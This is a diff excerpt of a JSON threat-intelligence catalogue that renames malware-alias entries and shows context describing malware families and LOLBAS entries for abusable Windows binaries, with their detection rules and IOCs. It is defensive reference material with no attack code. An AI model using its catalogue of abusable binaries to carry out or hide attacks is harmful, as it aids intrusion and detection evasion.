"ssh.exe" + "value": "ssh.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.\n\n**Author:** Akshat Pradhan\n\n**Paths:**\n* c:\\windows\\system32\\OpenSSH\\ssh.exe\n\n**Resources:**\n* [https://gtfobins.github.io/gtfobins/ssh/](https://gtfobins.github.io/gtfobins/ssh/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_ssh.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml)\n* IOC: Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe.\n* IOC: command line arguments specifying execution.[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]", @@ -29392,7 +29392,7 @@ } ], "uuid": "38298e66-6bbb-4ecf-b287-ccd3e47c6cd4", - "value": "CANOPY" + "value": "CANOPY - Associated Software" }, { "description": "[STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6), possibly since at least November 2021; there is also a [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) by UNC3313, which may be associated with [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6).[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)][[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]", @@ -29438,7 +29438,7 @@ } ], "uuid": "ab440fcd-bee3-42f5-a4a9-7edfd5c3992c", - "value": "DROPSHOT" + "value": "DROPSHOT - Associated Software" }, { "description": "[StoneDrill](https://app.tidalcyber.com/software/9eee52a2-5ac1-4561-826c-23ec7fbc7876) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac).[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]", @@ -29486,7 +29486,7 @@ } ], "uuid": "e93f9136-4ef0-4b23-85bd-93f2b56b2316", - "value": "Stordiag.exe" + "value": "Stordiag.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Storage diagnostic tool\n\n**Author:** Eral4m\n\n**Paths:**\n* c:\\windows\\system32\\stordiag.exe\n* c:\\windows\\syswow64\\stordiag.exe\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1451112385041911809](https://twitter.com/eral4m/status/1451112385041911809)\n\n**Detection:**\n* Sigma: [proc_creation_win_stordiag_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml)\n* IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]", @@ -29605,7 +29605,7 @@ } ], "uuid": "7948eb8a-e138-4365-81c4-aac07e632912", - "value": "W32.Stuxnet" + "value": "W32.Stuxnet - Associated Software" }, { "description": "[Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)][[CISA ICS Advisory ICSA-10-272-01](https://app.tidalcyber.com/references/25b3c18c-e017-4773-91dd-b489220d4fcb)][[ESET Stuxnet Under the Microscope](https://app.tidalcyber.com/references/4ec039a9-f843-42de-96ed-185c4e8c2d9f)][[Langer Stuxnet](https://app.tidalcyber.com/references/76b99581-e94d-4e51-8110-80557474048e)] [Stuxnet](https://app.tidalcyber.com/software/3fdf3833-fca9-4414-8d2e-779dabc4ee31) was discovered in 2010, with some components being used as early as November 2008.[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)] ", @@ -29710,7 +29710,7 @@ } ], "uuid": "a38c6f81-a115-4f16-bcba-7d8c163d4f08", - "value": "Solorigate" + "value": "Solorigate - Associated Software" }, { "description": "[SUNBURST](https://app.tidalcyber.com/software/6b04e98e-c541-4958-a8a5-d433e575ce78) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least February 2020.[[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)][[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]", @@ -29878,7 +29878,7 @@ } ], "uuid": "815e5fef-a5fc-4c84-94d1-c57c2f9991e1", - "value": "Syncappvpublishingserver.vbs" + "value": "Syncappvpublishingserver.vbs - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Script used related to app-v and publishing server\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\SyncAppvPublishingServer.vbs\n\n**Resources:**\n* [https://twitter.com/monoxgas/status/895045566090010624](https://twitter.com/monoxgas/status/895045566090010624)\n* [https://twitter.com/subTee/status/855738126882316288](https://twitter.com/subTee/status/855738126882316288)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml)[[Syncappvpublishingserver.vbs - LOLBAS Project](/references/adb09226-894c-4874-a2e3-fb2c6de30173)]", @@ -29921,7 +29921,7 @@ } ], "uuid": "3dbccfe5-d7f9-494f-9466-6aa4ca5d31c3", - "value": "SyncAppvPublishingServer.exe" + "value": "SyncAppvPublishingServer.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by App-v to get App-v server lists\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\SyncAppvPublishingServer.exe\n* C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe\n\n**Resources:**\n* [https://twitter.com/monoxgas/status/895045566090010624](https://twitter.com/monoxgas/status/895045566090010624)\n\n**Detection:**\n* Sigma: [posh_ps_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml)\n* Sigma: [posh_pm_syncappvpublishingserver_exe.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml)\n* Sigma: [proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml)\n* IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed[[SyncAppvPublishingServer.exe - LOLBAS Project](/references/ce371df7-aab6-4338-9491-656481cb5601)]", @@ -30037,7 +30037,7 @@ } ], "uuid": "fcadb7cd-ab8b-48e8-aee1-f8aa0ae3649d", - "value": "Syssetup.dll" + "value": "Syssetup.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows NT System Setup\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\syssetup.dll\n* c:\\windows\\syswow64\\syssetup.dll\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/994392481927258113](https://twitter.com/pabraeken/status/994392481927258113)\n* [https://twitter.com/harr0ey/status/975350238184697857](https://twitter.com/harr0ey/status/975350238184697857)\n* [https://twitter.com/bohops/status/975549525938135040](https://twitter.com/bohops/status/975549525938135040)\n* [https://windows10dll.nirsoft.net/syssetup_dll.html](https://windows10dll.nirsoft.net/syssetup_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___syssetup.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml)[[Syssetup.dll - LOLBAS Project](/references/3bb7027f-7cbb-47e7-8cbb-cf45604669af)]", @@ -30080,7 +30080,7 @@ } ], "uuid": "bfbd9f5b-1f12-4196-a3d9-0862306cf3a9", - "value": "Coroxy" + "value": "Coroxy - Associated Software" }, { "description": "", @@ -30096,7 +30096,7 @@ } ], "uuid": "11ea8d63-aa36-4c63-a1a3-6950edc006dd", - "value": "DroxiDat" + "value": "DroxiDat - Associated Software" }, { "description": "SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence & lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.[[BlackBerry SystemBC June 10 2021](/references/08186ff9-6ca5-4c09-b5e7-b883eb15fdba)][[Sophos SystemBC December 16 2020](/references/eca1301f-deeb-4a97-8c4e-e61210706116)][[WithSecure SystemBC May 10 2021](/references/4004e072-9e69-4e81-a2b7-840e106cf3d9)][[Trend Micro Play Ransomware September 06 2022](/references/ed02529c-920d-4a92-8e86-be1ed7083991)] According to Mandiant's 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.[[TechRepublic M-Trends 2023](/references/1347e21e-e77d-464d-bbbe-dc4d3f2b07a1)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/systembc/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/SystemBC", @@ -30227,7 +30227,7 @@ } ], "uuid": "0bfb3ec0-ee20-4de3-a69c-096402a0298b", - "value": "HyperSSL" + "value": "HyperSSL - Associated Software" }, { "description": "[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -30241,7 +30241,7 @@ } ], "uuid": "0bc0c9e4-a490-4ab1-a1c2-b8fd8dda05ce", - "value": "Soldier" + "value": "Soldier - Associated Software" }, { "description": "[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -30255,7 +30255,7 @@ } ], "uuid": "01924f4b-e6b3-4118-9b3d-6aac519d4774", - "value": "FOCUSFJORD" + "value": "FOCUSFJORD - Associated Software" }, { "description": "[SysUpdate](https://app.tidalcyber.com/software/148d587c-3b1e-4e71-bdfb-8c37005e7e77) is a backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -30451,7 +30451,7 @@ } ], "uuid": "13f7f0ae-b228-4453-b35e-cded8c9bcbb4", - "value": "Tar.exe" + "value": "Tar.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to extract and create archives.\n\n**Author:** Brian Lucero\n\n**Paths:**\n* C:\\Windows\\System32\\tar.exe\n\n**Resources:**\n* [https://twitter.com/Cyber_Sorcery/status/1619819249886969856](https://twitter.com/Cyber_Sorcery/status/1619819249886969856)\n\n**Detection:**\n* IOC: tar.exe extracting files from a remote host within the environment[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]", @@ -30673,7 +30673,7 @@ } ], "uuid": "7f9ba4e5-1bea-4620-855c-b9cf9e97da07", - "value": "te.exe" + "value": "te.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg](https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_use_of_te_bin.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml)[[te.exe - LOLBAS Project](/references/e7329381-319e-4dcc-8187-92882e6f2e12)]", @@ -30715,7 +30715,7 @@ } ], "uuid": "386539ac-dcd7-4484-9dcb-3e4aa849fd7c", - "value": "Teams.exe" + "value": "Teams.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Electron runtime binary which runs the Teams application\n\n**Author:** Andrew Kisliakov\n\n**Paths:**\n* %LOCALAPPDATA%\\Microsoft\\Teams\\current\\Teams.exe\n\n**Resources:**\n* [https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/](https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/)\n\n**Detection:**\n* IOC: %LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created\n* IOC: %LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater\n* Sigma: [proc_creation_win_susp_electron_exeuction_proxy.yml](https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml)[[Teams.exe - LOLBAS Project](/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]", @@ -30877,7 +30877,7 @@ } ], "uuid": "fcf88411-e0c2-403a-aa70-dc75fd1d488b", - "value": "TestWindowRemoteAgent.exe" + "value": "TestWindowRemoteAgent.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** TestWindowRemoteAgent.exe is the command-line tool to establish RPC\n\n**Author:** Onat Uzunyayla\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* IOC: TestWindowRemoteAgent.exe spawning unexpectedly[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]", @@ -30917,7 +30917,7 @@ } ], "uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", - "value": "DNSMessenger" + "value": "DNSMessenger - Associated Software" }, { "description": "[TEXTMATE](https://app.tidalcyber.com/software/49d0ae81-d51b-4534-b1e0-08371a47ef79) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) in February 2017. [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]", @@ -30963,7 +30963,7 @@ } ], "uuid": "6161f604-0972-427e-802e-b5ac009b94fe", - "value": "EvilQuest" + "value": "EvilQuest - Associated Software" }, { "description": "[[SentinelOne EvilQuest Ransomware Spyware 2020](https://app.tidalcyber.com/references/4dc26c77-d0ce-4836-a4cc-0490b6d7f115)]", @@ -30977,7 +30977,7 @@ } ], "uuid": "6979dd37-4c1c-48bf-a0e1-c8f2a0606962", - "value": "MacRansom.K" + "value": "MacRansom.K - Associated Software" }, { "description": "[ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.[[Reed thiefquest fake ransom](https://app.tidalcyber.com/references/b265ef93-c1fb-440d-a9e0-89cf25a3de05)] Even though [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)][[reed thiefquest ransomware analysis](https://app.tidalcyber.com/references/47b49df4-34f1-4a89-9983-e8bc19aadf8c)]", @@ -31296,7 +31296,7 @@ } ], "uuid": "5ad5e21b-789e-4b4e-92d3-377140d7274a", - "value": "Tracker.exe" + "value": "Tracker.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool included with Microsoft .Net Framework.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://twitter.com/subTee/status/793151392185589760](https://twitter.com/subTee/status/793151392185589760)\n* [https://attack.mitre.org/wiki/Execution](https://attack.mitre.org/wiki/Execution)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_tracker.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml)[[LOLBAS Tracker](/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]", @@ -31365,7 +31365,7 @@ } ], "uuid": "4a8dc24e-e942-46f3-8026-91c1ed059bbb", - "value": "TSPY_TRICKLOAD" + "value": "TSPY_TRICKLOAD - Associated Software" }, { "description": "[[Trend Micro Totbrick Oct 2016](https://app.tidalcyber.com/references/d6419764-f203-4089-8b38-860c442238e7)] [[Microsoft Totbrick Oct 2017](https://app.tidalcyber.com/references/3abe861b-0e3b-458a-98cf-38450058b4a5)]", @@ -31379,7 +31379,7 @@ } ], "uuid": "aabae1a3-d831-46f4-a65f-ab31f03fd687", - "value": "Totbrick" + "value": "Totbrick - Associated Software" }, { "description": "[TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724). [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) was developed and initially used by [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of \"big game hunting\" ransomware campaigns.[[S2 Grupo TrickBot June 2017](https://app.tidalcyber.com/references/28faff77-3e68-4f5c-974d-dc7c9d06ce5e)][[Fidelis TrickBot Oct 2016](https://app.tidalcyber.com/references/839c02d1-58ec-4e25-a981-0276dbb1acc8)][[IBM TrickBot Nov 2016](https://app.tidalcyber.com/references/092aec63-aea0-4bc9-9c05-add89b4233ff)][[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]", @@ -31437,7 +31437,7 @@ } ], "uuid": "e8b885ae-4bf3-42c0-8b9e-a410c08eb441", - "value": "xFrost" + "value": "xFrost - Associated Software" }, { "description": "[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]", @@ -31451,7 +31451,7 @@ } ], "uuid": "0ef3a4a1-cad0-45da-9eea-70f85cd888af", - "value": "Karagany" + "value": "Karagany - Associated Software" }, { "description": "[Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) is a modular remote access tool used for recon and linked to [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1). The source code for [Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. [[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)][[Dragos DYMALLOY ](https://app.tidalcyber.com/references/d2785c6e-e0d1-4e90-a2d5-2c302176d5d3)]", @@ -31521,7 +31521,7 @@ } ], "uuid": "7393cb6b-37a3-4f15-8a03-416b14711c2a", - "value": "TRUECORE" + "value": "TRUECORE - Associated Software" }, { "description": "[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]", @@ -31537,7 +31537,7 @@ } ], "uuid": "ba587d52-2ee7-4539-9499-aa9338b8c7f9", - "value": "Silence" + "value": "Silence - Associated Software" }, { "description": "Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.silence\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/truebot/\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/Truebot", @@ -31669,7 +31669,7 @@ } ], "uuid": "05cf2d78-08e4-4a20-ae82-64ff4a3c9c33", - "value": "Ttdinject.exe" + "value": "Ttdinject.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)\n\n**Author:** Maxime Nadeau\n\n**Paths:**\n* C:\\Windows\\System32\\ttdinject.exe\n* C:\\Windows\\Syswow64\\ttdinject.exe\n\n**Resources:**\n* [https://twitter.com/Oddvarmoe/status/1196333160470138880](https://twitter.com/Oddvarmoe/status/1196333160470138880)\n\n**Detection:**\n* Sigma: [create_remote_thread_win_ttdinjec.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml)\n* Sigma: [proc_creation_win_lolbin_ttdinject.yml](https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml)\n* IOC: Parent child relationship. Ttdinject.exe parent for executed command\n* IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]", @@ -31712,7 +31712,7 @@ } ], "uuid": "148072af-ae62-419f-9c3a-3b9dc4c25a24", - "value": "Tttracer.exe" + "value": "Tttracer.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows 1809 and newer to Debug Time Travel\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\tttracer.exe\n* C:\\Windows\\SysWOW64\\tttracer.exe\n\n**Resources:**\n* [https://twitter.com/oulusoyum/status/1191329746069655553](https://twitter.com/oulusoyum/status/1191329746069655553)\n* [https://twitter.com/mattifestation/status/1196390321783025666](https://twitter.com/mattifestation/status/1196390321783025666)\n* [https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html](https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml)\n* Sigma: [image_load_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)\n* IOC: Parent child relationship. Tttracer parent for executed command[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]", @@ -31923,7 +31923,7 @@ } ], "uuid": "824e7a25-83a0-4037-b0b5-af5fa1ed299a", - "value": "Unregmp2.exe" + "value": "Unregmp2.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Windows Media Player Setup Utility\n\n**Author:** Wade Hickey\n\n**Paths:**\n* C:\\Windows\\System32\\unregmp2.exe\n* C:\\Windows\\SysWOW64\\unregmp2.exe\n\n**Resources:**\n* [https://twitter.com/notwhickey/status/1466588365336293385](https://twitter.com/notwhickey/status/1466588365336293385)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_unregmp2.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml)\n* IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`[[Unregmp2.exe - LOLBAS 